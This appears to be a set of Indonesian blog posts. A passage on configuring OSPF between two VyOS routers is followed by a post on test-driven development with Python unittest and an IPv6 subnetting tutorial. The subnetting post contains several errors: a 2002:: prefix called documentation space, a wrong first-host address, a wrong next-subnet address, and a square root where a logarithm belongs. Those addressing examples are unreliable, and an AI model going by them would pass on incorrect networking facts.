Bayangkan kalau pakai non link-state seperti di atas yang kita cuma ikuti petunjuk jalan. Kita cuma tau belok kiri, belok kanan atau lurus. Kemudian setelah beberapa belokan ternyata kita sampai di simpangan yang sebelumnya sudah dilewati, akhirnya cuma berputar-putar di situ-situ saja tidak bisa sampai tujuan. Karena setelah diperiksa ternyata petunjuk jalannya salah pasang, dan di dunia routing hal itu juga bisa saja terjadi.

Sampai sini kita sudah paham bahwa OSPF masuk kategori IGP yang cuma beroperasi dalam satu lingkup Autonomous System. Kemudian OSPF adalah salah satu tipe link state routing protocol.

Sebelum kita lanjut, saya informasikan kalau ospf ini detail teknisnya agak rumit dan saya tidak bahas ospf sampai detail karena sepertinya butuh bab sendiri buat ospf dan bakal panjang dan membosankan.

Di sini saya cuma usahakan bagaimana ospf bisa up dan running tanpa tau detail bagaimana ospf itu kerjanya. Anggap seperti orang yang belajar nyetir mobil, dia tidak perlu tau detail bagaimana cara kerja mesin.

Minimalnya kalau mau buat jaringan OSPF, paling tidak ada dua informasi yang perlu kita tau; Area sama Network.

Area. Area di ospf fungsinya segmentasi logis router. Jadi ada sekelompok router di area A, ada lagi sekelompok router di area B, dan seterusnya.

Bayangkan kalau misalnya kita punya 100 router yang terkoneksi ospf di satu area, ukuran lsdb pasti bengkak, terus kalau salah satu router mengalami perubahan link state, maka LSA akan membanjiri jaringan.

Di sini fungsi area, kita bisa secara logis mengelompokkan router-router ke beberapa area terpisah. Dengan pengelompokan area ini, router ospf cuma me-maintain lsdb di area yang sama. Artinya router-router ini cuma tau topologi di areanya saja, topologi di area lain tidak kelihatan.

Ada beberapa tipe area di ospf, di sini dua saja yang akan saya bahas. Pertama standard area, dan kedua stub area. Area di ospf ditulis seperti format ip address, misal 0.0.0.0 atau 192.168.1.0, dst.

Ada satu standard area yang wajib ada di ospf, namanya area backbone atau area 0. Area backbone bisa ditulis pakai 0.0.0.0 atau cukup 0. Semua area selain backbone harus terkoneksi ke area ini.

Area yang satu lagi namanya stub area. Tipe area ini area tertutup, artinya jalan keluar masuk area ini cuma lewat satu pintu saja, satu router. Jadi di area stub ini ada satu router yang fungsinya jadi gateway ke network di luar area, router ini disebut ABR atau Area Border Router.

Fungsi router ABR ini meng-inject default route ke area stub, jadi nantinya semua router di area stub ini punya entri routing default route 0.0.0.0/0 yang gateway-nya router ABR.

Jadi di area stub ini tidak semua routing ospf ada, cuma ada routing intra-area atau routing di area stub ini saja, plus satu routing untuk default gateway lewat router ABR. Karena itu traffic LSA di area ini tidak besar, jadinya ukuran lsdb juga kecil.

Karena ukuran lsdb-nya yang kecil, tipe area ini cocok buat router-router kecil yang tidak punya memori besar.

Jadi kapan kita pakai area stub? Pertimbangannya, kalau area ini area jalan buntu, keluar masuk area cuma ada satu jalan saja, lewat router ABR. Kedua, kalau router-router di area ini router kecil yang cuma perlu default route.

Network. Di dalam area ospf, apakah itu standard area atau stub area, di dalam area ini ada network nya, misal network 10.10.10.0/24 masuk area backbone, dan network 192.168.1.0/24 masuk area 192.168.1.0 yang tipe areanya stub. Di dalam satu area bisa ada lebih dari satu network.

Misal kalau kita set network 10.10.10.0/24 ke area backbone, maka ospf bakal cek interface router yang mana saja yang masuk ke network 10.10.10.0/24. Kalau misalnya interface eth0 ada ip address 10.10.10.1 maka eth0 dimasukkan ke ospf dan ospf mulai mem-broadcast LSA lewat eth0.

Ospf membentuk adjacency kalau router ada deteksi router ospf lain yang punya network sama dan ada di area yang sama. Jadi kalau ada dua atau lebih router ospf di satu broadcast domain, punya network yang sama dan network ini ada di area yang sama maka bakal terbentuk adjcency antar router ospf yang saling bertetangga. Kalau sudah terbentuk adjacency, router bisa saling broadcast LSA masing-masing.

Route redistribution

Seperti juga bgp di atas, kita juga bisa import routing dari protokol lain ke ospf supaya router yang lain tau jalur ke prefix ini.

Konfigurasi OSPF

Kita pakai lagi router untuk setting bgp di atas buat ospf. Jadi router1 ip addressnya 172.16.3.1/30 dan router router2 172.16.3.2/30. Router2 punya dua prefix connected, 10.10.10.0/24 sama 192.168.1.0/24 yang dua prefix connected ini nantinya kita inject ke ospf.

Router1 dan router2 terkoneksi satu broadcast domain di network 172.16.3.0/30. Network ini yang kita pakai dan set ke area 0 atau area backbone.

vyos@ROUTER1:~$ configure
[edit]
vyos@ROUTER1# set protocols ospf area 0 network 172.16.3.0/30
[edit]
vyos@ROUTER1# show protocols ospf
+area 0 {
+    network 172.16.3.0/30
+}
[edit]
vyos@ROUTER1# commit
[edit]
vyos@ROUTER1# save
Saving configuration to '/config/config.boot'...
Done
[edit]
vyos@ROUTER1#

Router1 sudah terset, tinggal router2.

vyos@ROUTER2:~$ configure
[edit]
vyos@ROUTER2# set protocols ospf area 0 network 172.16.3.0/30
[edit]
vyos@ROUTER2# commit
[edit]
vyos@ROUTER2#

Kalau sudah berhasil terbentuk adjacency, kita bisa lihat detail tetangga ospf kita.

vyos@ROUTER2# run show ip ospf neighbor

    Neighbor ID Pri State           Dead Time Address         Interface            RXmtL RqstL DBsmL
172.16.3.1        1 2-Way/DROther     34.366s 172.16.3.1      eth0:172.16.3.2          0     0     0
[edit]
vyos@ROUTER2#

Berhasil, neighbor 172.16.3.1 terbaca dari router2. Di salah satu router ospf kita bisa cek routing ospf pakai command show ip route ospf

vyos@ROUTER1:~$ show ip route ospf
Codes: K - kernel route, C - connected, S - static, R - RIP, O - OSPF,
       I - ISIS, B - BGP, > - selected route, * - FIB route

O   172.16.3.0/30 [110/10] is directly connected, eth1, 00:08:32
vyos@ROUTER1:~$

Cuma ada satu prefix 172.16.3.0/30. Berikutnya di router2 kita coba import prefix connected ke ospf.

vyos@ROUTER2# set protocols ospf redistribute connected
[edit]
vyos@ROUTER2# commit
[edit]
vyos@ROUTER2#

Cek lagi di router1, apa sudah ada prefix yang diimport.

vyos@ROUTER1:~$ show ip route ospf
Codes: K - kernel route, C - connected, S - static, R - RIP, O - OSPF,
       I - ISIS, B - BGP, > - selected route, * - FIB route

O   10.10.10.0/24 [110/20] via 172.16.3.2, 00:00:03
O   172.16.3.0/30 [110/10] is directly connected, eth1, 00:11:09
O   192.168.1.0/24 [110/20] via 172.16.3.2, 00:00:03
vyos@ROUTER1:~$
vyos@ROUTER1:~$ ping 10.10.10.1
PING 10.10.10.1 (10.10.10.1) 56(84) bytes of data.
64 bytes from 10.10.10.1: icmp_req=1 ttl=64 time=0.677 ms
64 bytes from 10.10.10.1: icmp_req=2 ttl=64 time=1.13 ms
^C
--- 10.10.10.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 0.677/0.905/1.133/0.228 ms

Prefix 10.10.10.0/24 sama 192.168.1.0/24 terbaca dari router1 dan gatewaynya router2 yang address nya 172.16.3.2.

Baik, saya rasa sudah cukup panjang dan saya cuma sampai di sini. Selanjutnya silakan teman-teman lanjutkan sendiri eksperimen nya.

Kalau ada koreksi, saran, kritik atau komentar silakan disampaikan.

Terima kasih dan semoga bermanfaat.

Test-driven development (TDD) bukan sekedar unit testing

2018-08-18T07:35:00+08:00

TDD atau Test-driven development?

Yes.., istilah yang lagi ngetrend di dunia software development. Apa dan bagaimana TDD ini? di bawah, saya tuliskan apa itu TDD menurut apa yang saya pahami. Mungkin tidak terlalu akurat tapi paling tidak itulah pemahaman saya tentang metode development ini, silakan dilanjut.

Jadi sebenarnya, istilah Test-driven development ini sudah lama saya baca dan dengar sekilas, tapi kurang menarik minat saya untuk mempelajari lebih lanjut. Alasannya karena satu, karena koding cuma sekedar hobi dan bukan hal serius buat saya waktu itu, saya belum pernah terlibat di project software development yang kompleks. Kedua, karena menurut saya developer yang pakai metode ini seperti kurang kerjaan, siapa yang punya waktu buat nulis kode yang dipakai buat ngetes kodenya sendiri? yang bahkan kode tes ini bisa lebih rumit dan lebih panjang dari kode yang dites.

Dan akhir-akhir ini waktu saya mulai belajar lagi tentang praktek software engineering yang kekinian, termasuk konsep TDD yang saya review lagi. Dan ada sepotong kalimat di Wikipedia, mengatakan bahwa kode tes ditulis lebih dulu dari kode yang dites dan ini yang malah yang jadi core idea nya TDD.
Nah apa maksudnya ini, tulis kode tes buat ngetes kode yang belum ada? jawabannya karena inti dari TDD bukan tentang tes. Ya, setelah baca sana sini, saya berkesimpulan bahwa Test-driven development atau TDD ini bukan tentang test, memang ada kata test tapi bukan itu intinya.
Jadi selama ini saya salah karena memahami bahwa TDD dan unit testing itu sama. Ternyata bukan begitu, TDD ini lebih tentang Spesifikasi dan Implementasi, TDD lebih ke desain daripada praktek unit testing.

Spesifikasi dan Implementasi

Kalau tentang spesifikasi dan implementasi, saya rasa ini tidak asing. Di bahasa pemrograman C misalnya ada C89 dan C99. Bahkan diluar programming pun, banyak contohnya, seperti protokol komunikasi yang spesifikasinya dirumuskan di artikel rfc.

Spesifikasi ini lebih seperti desain dan rule set, sedangkan implementasi seperti.. ya implementasi. Contoh saja begini, dalam komunikasi protokol HTTP misalnya, ada beberapa server http yang kita kenal seperti Apache, Nginx, atau Lighttpd. Ini servernya, sedangkan http client ada web browser yang lebih banyak lagi macamnya, ada Google Chrome atau Mozilla Firefox, dan sebagainya.
Mereka yang bermacam-macam ini berbicara dengan bahasa yang sama, bahasa http. Prosesnya, client semisal web browser request resource di web, kalau sukses servernya membalas dengan kode 200. Semua web browser paham ini, kalau kode 200 berarti OK. Atau kalau misalnya file yang diminta tidak ditemukan, kode balasannya error 404. Server apa saja kode balasannya sama, dan client apa saja bisa mengerti ini.

Nah dari sini, protokol komunikasi http ini dinamakan spesifikasi, sementara server dan client yang bermacam-macam itu implementasinya, mereka mengimplementasikan spesifikasi http. Tapi biarpun mengimplementasikan spesifikasi yang sama, bisa jadi cara implementasinya tidak sama, karena itu kadang implementasi yang satu lebih baik dari yang lain. Contoh Nginx dan Apache2 yang sama-sama web server populer, Apache dikenal karena full feature sedangkan Nginx dikenal dengan kecepatannya, ini karena cara implementasi yang tidak sama. Begitu juga client http nya, antara Chrome dan Firefox tentu saja ada perbedaan.

Lebih spesifik ke programming, ambil contoh di bahasa C. Bahasa C ini bahasa pemrograman yang terstandar dan library nya ada yang namanya standard library.
Ambil contoh untuk konversi string ke integer, kita bisa pakai function atoi(). Function atoi() ini didefinisikan di header stdlib.h

Kalau kita baca manualnya atoi(), function ini meng-convert string ke integer, inputnya pointer ke char dan outputnya integer. Char pointer bisa disebut saja dengan string kalau di bahasa lain, di C tidak ada tipe data string tapi anggap saja string.

Jadi spesifikasi atoi() ini jelas, fungsinya merubah huruf ke angka, inputnya string outputnya angka integer. Nah sedangkan implementasinya, ada beberapa yang umum di instalasi Linux, ada glibc atau GNU C Library ada juga uClibc yang lebih ringan dan biasa dipakai di system embed.
Dua library ini mengimplementasikan spesifikasi yang sama, entah kita pakai library dari GNU atau uClibc, function atoi() bisa dipakai dan fungsinya sama, hasilnya juga sama biarpun mungkin yang satu lebih bagus atau lebih cepat dari yang lain.

Di bahasa pemrograman lain, seperti Python pun sama. Python ini sebenarnya spesifikasi bahasa pemrograman yang implementasinya ada lebih dari satu. Ada yang implementasinya pakai bahasa C yang disebut CPython, ada yang pakai Java yang disebut Jython, bahkan ada yang diimplementasikan pakai framework .NET, namanya IronPython.

Sekarang setelah paham tentang spesifikasi dan implementasi, kita kembali ke TDD, Test-driven development. Di TDD, kalau kita mau buat function atau class method, kita tidak langsung koding ngetik kodenya. Tapi, langkah pertama adalah mendefinisikan spesifikasi. Spesifikasi dibuat sejelas mungkin, nama function atau methodnya ini, fungsinya untuk ini, inputnya ini dan outputnya itu. Spesifikasi tidak membahas bagaimana cara implementasinya, karena itu tidak terlalu penting, yang penting adalah apa yang dilakukannya, bukan bagaimana cara melakukannya.

Setelah ada gambaran spesifikasi, kemudian dibuat dokumentasi, ini berguna kalau ada programmer lain yang nantinya pakai function atau method ini. Setelah itu, kita buat kode test. Jadi, kode test disini fungsinya memastikan apakah function atau method yang kita buat itu sesuai dengan spesifikasi yang sudah dibuat diawal atau tidak. Kalau lolos tes, berarti kode kita sesuai dengan spesifikasi kalau tidak berarti ada yang salah dengan implementasinya.

Untuk implementasinya, ada tiga rule yang direkomendasikan. Rule ini tidak strict harus diikuti, tapi saya tulis saja di sini:

Make it work.
Make it right, dan
Make it fast.

Jadi waktu koding implementasi, yang penting lolos uji dulu biarpun kodenya kurang bagus. Setelah lolos tes pertama, baru selanjutnya diperbaiki dan terakhir baru optimasi.

TDD dengan Python dan Unittest

Sekarang kita coba pakai contoh TDD pakai bahasa Python, test pakai library unittest.
Misal kita perlu sebuah function untuk hitung kelipatan dua dari angka yang diinput, misal inputnya 5 hasilnya 10, inputnya 3 hasilnya 6.

Pertama, deskripsikan dengan jelas spesifikasinya.

Nama function : kali_dua(input)
Fungsi : Menghitung kelipatan 2 dari input
Input : Integer yang akan dihitung
Output : Integer hasil proses

Siapapun yang baca spesifikasi ini pasti paham penggunaannya.

Selanjutnya, buat kode tes di file yang terpisah dari kode yang dites. Misal nama filenya test_hitung.py dan nama file kode nya hitung.py

#!/usr/bin/env python

import unittest
import hitung

class TestHitung(unittest.TestCase):
    def test_kali_dua(self):
        self.assertTrue(hitung.kali_dua(5) == 10)

if __name__ == '__main__':
    unittest.main()

Di kode tes di atas itu kita coba tes dengan input angka 5 dan cek hasilnya apa benar hasilnya 10.
Dan kalau test ini dijalankan:

python test_hitung.py

E
======================================================================
ERROR: test_kali_dua (__main__.TestHitung)
----------------------------------------------------------------------
Traceback (most recent call last):
File "test_hitung.py", line 8, in test_kali_dua
    self.assertTrue(hitung.kali_dua(5) == 10)
AttributeError: 'module' object has no attribute 'kali_dua'

----------------------------------------------------------------------
Ran 1 test in 0.000s

FAILED (errors=1)

Error, karena di file hitung.py belum ada function kali_dua(). Berikutnya mulai tulis kode implementasi. Kita buat kode yang sangat simpel saja yang penting lolos tes. Di file hitung.py, kita bisa buat kode seperti di bawah:

#!/usr/bin/env python

def kali_dua(input):
    return 10

Kode ini sangat sederhana, return value nya terus 10 berapapun inputnya. Kita buat return value nya 10 karena di kode tes nya kita sudah lihat, tes itu ngecek apa benar hasilnya 10.

Tes lagi.

python test_hitung.py

.
----------------------------------------------------------------------
Ran 1 test in 0.000s

OK

Hasilnya OK, dari sini kita sudah tahu bahwa kode implementasi itu lolos tes.
Berikutnya, coba modifikasi kode tes, tes dengan input yang berbeda, 6 misalnya.

#!/usr/bin/env python

import unittest
import hitung

class TestHitung(unittest.TestCase):
    def test_kali_dua(self):
        self.assertTrue(hitung.kali_dua(5) == 10)
        self.assertTrue(hitung.kali_dua(6) == 12)

if __name__ == '__main__':
    unittest.main()

Test.

python test_hitung.py
F
======================================================================
FAIL: test_kali_dua (__main__.TestHitung)
----------------------------------------------------------------------
Traceback (most recent call last):
File "test_hitung.py", line 9, in test_kali_dua
    self.assertTrue(hitung.kali_dua(6) == 12)
AssertionError: False is not true

----------------------------------------------------------------------
Ran 1 test in 0.000s

FAILED (failures=1)

Gagal, karena input 6 hasinya tetap 10, bukan 12. Selanjutnya rule nomor 2, make it right. Modifikasi kode supaya berapapun inputnya hasilnya kelipatan duanya.

#!/usr/bin/env python

def kali_dua(input):
    return input * 2

Test lagi, hasilnya OK.

python test_hitung.py

.
----------------------------------------------------------------------
Ran 1 test in 0.000s

OK

Dengan begini, berapapun angka input hasilnya benar.
Tapi bagaimana kalau nantinya yang manggil function ini kasih input bukan angka tapi huruf? misalnya kali_dua("abcd"). Kita bisa tambahkan verifikasi input, misalnya:

#!/usr/bin/env python

def kali_dua(input):
    if not isinstance(input, int):
        raise ValueError("Input not an integer")
    return input * 2

Berikutnya, rule nomor 3 make it fast.
Dari sudut pandang spesifikasi, kode kita sudah benar karena tidak ada error. Tapi kita bisa misalnya, optimasi kode supaya lebih efisien atau lebih cepat tanpa mempengaruhi hasil output, contoh:

#!/usr/bin/env python

def kali_dua(input):
    if not isinstance(input, int):
        raise ValueError("Input not an integer")
    return input << 1

Kalau di tes lagi, hasilnya tetap OK, tidak ada yang berubah dari sudut pandang eksternal, biarpun di sisi internal implementasi ada perubahan.

python test_hitung.py

.
----------------------------------------------------------------------
Ran 1 test in 0.000s

OK

Jadi kita bisa modifikasi implementasi kode supaya lebih bagus dan setelah itu jalankan tes lagi supaya kita yakin bahwa perubahan itu tetap conform atau sesuai dengan spesifikasi dan tidak merusak fungsi program yang lain.

Tentu saja ada saatnya kita pikir bahwa spesifikasi yang sekarang kurang bagus dan perlu diupdate, maka dokumentasi juga perlu diupdate dan juga kode tes nya harus diupdate.

Benefits

Sekarang bicara masalah benefit. Dari apa yang saya rasakan pakai metode ini, ada beberapa kelebihannya. Tapi, ini menurut saya pribadi yang tentu saja subjektif dan tidak merepresentasikan TDD.

Waktu debugging yang berkurang
Sebelumnya, biasanya saya koding panjang sambil berharap kode ini nanti bakalan tidak error. Nyatanya, berjam-jam kemudian waktunya untuk debugging cari sumber problem.

Dengan TDD tidak begitu, bukan berarti tidak ada bug, tapi lebih sedikit. Karena dengan TDD, kode dimulai dari sederhana, pastikan tidak ada error, kemudian improve dan improve.

Design program yang lebih modular
Artinya, keterikatan antar modul jadi berkurang. Setiap function atau method bisa dengan gampang diganti kode implementasinya tanpa ada pengaruh ke bagian program yang lain.

Problem ini disebut software regression, ketika satu bagian dimodifikasi, bagian lain jadi rusak, bug ini fix malah muncul bug baru yang lain. Dengan desain yang lebih decoupled atau modular, problem ini bisa diminimalisir.

Satu rule function yang sering dilupakan, bahwa suatu function, method atau subroutine seharusnya cuma melakukan satu hal saja, tapi melakukannya dengan baik. TDD, bisa sedikit memaksa kita berpikir seperti ini.

Lebih reliable
Biasanya, kalau kode program sudah panjang dan kompleks, modifikasi bagian program jadi agak ragu karena bisa jadi bagian yang lain jadi rusak. TDD dengan tes nya bisa buat kita lebih yakin dengan kode yang dibuat atau dirubah, karena tes itu memastikan kode tetap pada jalur.

Paling tidak, beberapa hal di atas ini yang saya rasakan sisi lebihnya. Kalau minusnya, nulis kode jadi lebih lama, selain karena harus nulis tes juga karena berpikir lebih lama diawal.

Terakhir, Test-driven development bukanlah satu-satunya development model, bukan juga senjata yang ampuh disemua keadaan. Tapi menurut saya pribadi, TDD pantas untuk dipelajari.
Saya yakin tidak semua sepakat dengan saya :)

Subnetting IPv6 bisa semudah IPv4, bahkan lebih mudah.

2017-10-18T13:55:00+08:00

Image: ipv6forum.com

Halo teman-teman pembaca, ini revisi tulisan saya sebelumnya tentang subnetting IPv6. Di tulisan sebelumnya ada sedikit kesalahan yang perlu saya koreksi, terima kasih kepada pembaca yang sudah mengoreksi.

Jadi, ini dia.. sebut saja Subnetting IPv6 edisi revisi atau Subnetting IPv6 v2. :)

Di tulisan sebelumnya ada beberapa rumus, tapi di tulisan yang ini saya pakai lebih banyak gambar yang mungkin saja lebih memudahkan.

Saya berasumsi teman-teman yang membaca ini sudah paling tidak sedikit memahami apa itu IPv6, perbedaannya dengan IPv4, penulisannya, dsb. Tapi kalau ternyata belum ngeh apa itu IPv6, jangan belajar subnetting dulu tapi baca artikel yang ini “Hampir” Semua Tentang IPv6

Baik, sebelum ke cara subnetting saya tulis lagi apa-apa saja yang perlu diketahui di IPv6.

IPv4 dan IPv6

Saya masih menemui ada teknisi jaringan yang beranggapan bahwa IPv4 dan IPv6 sama, hanya saja IPv6 jumlah IP address nya lebih banyak dari IPv4 dan penulisan alamatnya berbeda.
Tidak benar, IPv4 dan IPv6 tidak sama. IP (Internet Protocol), ada kata protokol di situ. Protokol itu satu set aturan yang sudah dirumuskan dan disepakati bersama.
Jadi apa pun perangkat jaringannya selama dia perangkat IP di layer 3, entah itu server, router, atau smartphone, mereka berbicara dengan bahasa yang sama, bahasa IP atau protokol IP.
Nah protokol IP saat ini di ada dua, protokol versi 4 (IPv4) dan protokol versi 6 (IPv6). Keduanya ini biarpun masih sama-sama IP tapi bahasanya sudah berbeda, jadi tidak kompatibel satu sama lain.

Kemudian di IPv4, kita terbiasa subnetting sampai bit terpanjang, misalnya /30 dari IPv4 yang 32 bit.
Di IPv6, rule nya beda. IPv6 sepanjang 128 bit, tapi subnet terkecil cuma sampai /64. Artinya dari bit ke 65 sampai bit ke 128 jadi alamat host, tidak ada subnetting /72 atau /96.^[1]
Jadi IPv6 itu /64 everywhere, biarpun network isinya cuma 10 host, tetap /64 yang dipakai. Tapi ada pengecualian untuk link inter-router, satu network yang isinya dua router. Untuk yang ini dipakai /127.^[2]

Lagi, di IPv4 biasanya kalau subnetting yang diingat itu alamat pertama network, alamat terakhir broadcast, ditengah-tengah alamat unicast atau alamat untuk host.
Di IPv6, tidak ada broadcast, jadi alamat terakhir bisa dipakai untuk host.

Subnetting IPv6

Saya rasa kita punya masalah yang sama kalau berurusan sama IPv6, bilangan hex. Kita, atau paling tidak saya terbiasa pakai desimal, heksadesimal kelihatannya asing dan sulit.

Tapi sesuai judulnya, subnetting IPv6 bisa lebih mudah dari IPv4. Bagaimana bisa?
Karena penulisannya pakai hex, itu yang bikin gampang. Iya, jadi hex itu malah mempermudah, karena subnetting itu tidak lepas dari bit bilangan biner, sedangkan satu karakter heksadesimal sama dengan 4 bit biner.

Saya ulangi lagi, Satu karakter heksadesimal sama dengan 4 bit biner

Contoh biner 11111111 kalau di desimal ditulis 255 tapi di hex ditulis ff atau 0xff

Dengan gambar mungkin bisa lebih dipahami.

Gambar 1.

Kita pakai prefix 2002:db8:abcd:dead::/64 di contoh ini. Prefix ini, 2001:db8::/32 memang dikhususkan untuk dokumentasi, tutorial, dsb. ^[3]

Keterangan gambar di bawah:

Notasi Hex IPv6: Ini prefix IPv6 yang kita pakai untuk contoh.
Nomor Hex: Nomor kolom karakter heksadesimal.
Jumlah bit: Panjang bit di kolom hex ke sekian. Misal hex 2001, karena 2001 ada 4 kolom, panjang bit nya adalah 16, di notasi biner ditulis seperti ini 0010 0000 0000 0001. Paham? Jadi hex ke biner nya seperti ini 2=0010, 0=0000, 0=0000, 1=0001, satu hex sama dengan 4 bit biner.

Kalau sudah bisa dipahami, kita ambil contoh.
Network 2001:db8::/32, bagi ke jaringan kecil /34.
Dari sini ada beberapa istilah di bawah:

Network: di contoh ini 2001:db8::/32 Ini network besarnya, artinya /32, bit dari 33 sampai 128 punya kita dan bisa diatur semau kita, sedangkan bit 1 sampai bit 32 bukan punya kita dan tidak bisa kita rubah.
Sub network atau subnet: subnet ini cabang dari network. Di contoh ini /34

Lebih jelasnya seperti gambar di bawah:

Jadi subnetting itu membagi network ke sub network atau subnet.

Nah pertanyaan di subnetting kan biasanya, berapa jumlah subnet, apa saja subnet-nya, berapa jumlah host, dsb.

Baik, saya perkenalkan variabel lagi:

Jumlah subnet (y): kita sebut saya jumlah subnet dengan y. Cara menghitungnya, 2 ^ (subnet - network). Di contoh ini network /32 dibagi ke subnet /34. Jadi 2 ^ 34-32 = 2 ^ 2 = 4.
Lihat lagi gambar di atas, network /32 kalau dibagi ke /34, jadinya 4 subnet /34. Jadi y = 4.

Jumlah host dalam subnet: Gampang, 2 ^ 128 - subnet. Di contoh berarti 2 ^ 128-34 = 2 ^ 94. Silakan dihitung berapa hasil 2 pangkat 94.

Alamat subnet: Ini yang agak tricky. Untuk menghitung alamat subnetnya, kita perlu beberapa variabel.
- Nomor kolom hex (x). Kembali ke gambar pertama, x ini nomor kolom di bit subnet. Di contoh ini bit subnet 34, jadi x atau nomor kolom di kolom 9.
Kenapa nomor 9? karena, ingat lagi satu hex = 4 bit biner, dan kolom nomor 9 ada 4 bit dari bit ke 33 sampai 36.

Kelipatan subnet (z). z ini dipakai untuk menghitung subnet selanjutnya. Di contoh, /32 dibagi ke /34 dan hasilnya ada 4 subnet /34. Jadi untuk mengetahui subnet /34 pertama, /34 ke dua, ke tiga, dan ke empat, caranya nomor kolom (x) ditambah kelipatan subnet (z) sama dengan subnet berikutnya.

Perhatikan gambar di atas, jadi setiap kolom ada 4 bit, dan bit ini diberi nomor 1 sampai 4. Kalau bit subnet ada di nomor bit 1, maka kelipatan subnet berikutnya dengan menambahkan 8, z = 8, kalau di nomor 2, maka z = 4, nomor 3 z = 2 dan kalau di nomor 4 maka z = 1.
Jadi untuk menghitung subnet berikutnya nomor kolom (x) ditambah (z).

Di contoh ini, network 2001:db8::/32 dibagi ke subnet /34, kita bisa terapkan perhitungannya.

x nomor kolom. /34 ada di kolom 9.
y atau jumlah subnet = 4. 2 ^ 34-32 = 2 ^ 2 = 4.
z kelipatan. /34 ada di nomor bit ke 2, jadi z = 4.

Jadi, tambahkan nomor kolom x (9) dengan kelipatan z (4) sampai jumlah subnet y sama dengan 4.

2001:0db8::/32
- 1. 2001:0db8:0000::/34 atau bisa ditulis 2001:db8::/34
- 2. 2001:0db8:4000::/34
- 3. 2001:0db8:8000::/34
- 4. 2001:0db8:c000::/34

Kita lanjut dengan contoh lain.

Contoh 1.
Diberikan network 2001:db8::/32, subnetting ke jaringan kecil /36. Berapa jumlah subnet, dan apa saja networknya?

x nomor kolom. /36 ada di kolom 9.
y atau jumlah subnet = 16. 2 ^ 36-32 = 2 ^ 4 = 16.
z kelipatan. /36 ada di nomor bit ke 4, jadi z = 1.

Jadi, tambahkan nomor kolom x dengan kelipatan z sampai jumlah subnet y sama dengan 16.

Hitung dari kiri ke kanan, karakter ke 9 heksadesimal kita tambahkan dengan 1. Ulangi terus sampai jumlah subnet, atau y = 16.

========================
y    subnet
========================
1    2001:0db8:0000::/36 atau bisa ditulis 2001:db8::/36
2    2001:0db8:1000::/36
3    2001:0db8:2000::/36
4    2001:0db8:3000::/36
5    2001:0db8:4000::/36
6    2001:0db8:5000::/36
7    2001:0db8:6000::/36
8    2001:0db8:7000::/36
9    2001:0db8:8000::/36
10   2001:0db8:9000::/36
11   2001:0db8:a000::/36
12   2001:0db8:b000::/36
13   2001:0db8:c000::/36
14   2001:0db8:d000::/36
15   2001:0db8:e000::/36
16   2001:0db8:f000::/36

Contoh 2.
Dari network 2001:db8:c000::/34, bagi ke dalam 3 jaringan kecil.

Bisa kah?
Tidak bisa, kita pelu ingat bahwa y, atau jumlah subnet adalah pangkat 2. Yaitu 1, 2, 4, 8, 16, 32, 64, dan seterusnya. Jadi membagi jaringan kedalam 3 jaringan kecil itu tidak bisa. Bisanya, kita ambil yang mendekati tapi tidak lebih kecil. Yang mendekati 3 tapi tidak lebih kecil dari 3 adalah 4, atau 2².

Jadi, kita akan bagi 2001:db8:c000::/34 kedalam 4 subnet kecil, atau y = 4.

network = 34
subnet  = tidak diketahui
y       = 4

Kita cari subnet dengan sedikit aljabar.

            y  = 2 ^ subnet - network
            4  = 2 ^ subnet - 34
 (subnet - 34) = akar 4
 (subnet - 34) = 2
        subnet = 34 + 2
        subnet = 36

Jadi,
 network = 34
 subnet  = 36
       y = 4

x nomor kolom. /36 ada di kolom 9.
y atau jumlah subnet = 4. 2 ^ 36-34 = 2 ^ 2 = 4.
z kelipatan. /36 ada di nomor bit ke 4, jadi z = 1.

Hitung dari kiri ke kanan, x atau karakter ke 9 heksadesimal kita tambahkan dengan 1, karena z = 1. Ulangi terus sampai y = 4.

======================
y   subnet
======================
1   2001:0db8:c000::/36 atau bisa ditulis 2001:db8:c000::/36
2   2001:0db8:d000::/36
3   2001:0db8:e000::/36
4   2001:0db8:f000::/36

Contoh 3.
Di dalam network 2001:db8:e000::/36, berapa jumlah host yang ada di network tersebut, berapa alamat ip host pertama dan berapa alamat ip host terakhir?
Karena IPv6 sepanjang 128 bit, maka jumlah host untuk /36 adalah:

2 ^ 128-36
2 ^ 92
4.951.760.157.000.000.000.000.000.000

Saya tidak tahu bagaimana menyebut angka diatas.

Dalam network 2001:db8:e000::/36, host awal dan terakhir sbb:

host pertama  : 2001:db8:e000:0000:0000:0000:0000:0001 atau bisa ditulis 2001:db8::1
host terakhir : 2001:db8:efff:ffff:ffff:ffff:ffff:ffff

Mengapa host terakhir 2001:db8:efff:ffff:ffff:ffff:ffff:ffff?
Karena alamat ini kalau ditambahkan 1 sudah masuk subnet /36 berikutnya yang alamat subnetnya 2002:db8:f000::/36, dan alamat host terakhir ini bukan alamat broadcast karena tidak ada broadcast di IPv6.

Contoh terakhir, contoh ke 4.
Bagi network 2001:db8:e000::/36 ke subnet /41.

Silahkan dihitung, kemudian bandingkan hasilnya dengan yang di bawah.

=======================
y   Subnet
=======================
1   2001:0db8:e000::/41
2   2001:0db8:e080::/41
3   2001:0db8:e100::/41
4   2001:0db8:e180::/41
5   2001:0db8:e200::/41
6   2001:0db8:e280::/41
7   2001:0db8:e300::/41
8   2001:0db8:e380::/41
9   2001:0db8:e400::/41
10  2001:0db8:e480::/41
11  2001:0db8:e500::/41
12  2001:0db8:e580::/41
13  2001:0db8:e600::/41
14  2001:0db8:e680::/41
15  2001:0db8:e700::/41
16  2001:0db8:e780::/41
17  2001:0db8:e800::/41
18  2001:0db8:e880::/41
19  2001:0db8:e900::/41
20  2001:0db8:e980::/41
21  2001:0db8:ea00::/41
22  2001:0db8:ea80::/41
23  2001:0db8:eb00::/41
24  2001:0db8:eb80::/41
25  2001:0db8:ec00::/41
26  2001:0db8:ec80::/41
27  2001:0db8:ed00::/41
28  2001:0db8:ed80::/41
29  2001:0db8:ee00::/41
30  2001:0db8:ee80::/41
31  2001:0db8:ef00::/41
32  2001:0db8:ef80::/41

Contoh sudah selesai, sekarang kuis
Saya punya network 2001:db8::/32. Kemudian saya delegasikan 1 prefix /48 ke teman-teman. Prefix network-nya 2001:db8:abcd::/48. Saya minta teman-teman bagi prefix network ini ke /56.

Pertanyaan saya, berapa jumlah subnet nya, dan apa saja alamat subnet nya.

Baik saya rasa cukup, silakan kalau ada yang kurang jelas atau ada yang perlu dikoreksi lagi bisa tuliskan di komen. Jangan lupa bantu share kalau artikel ini membantu pemahaman subnetting IPv6.

Artikel berkaitan:
“Hampir” Semua Tentang IPv6
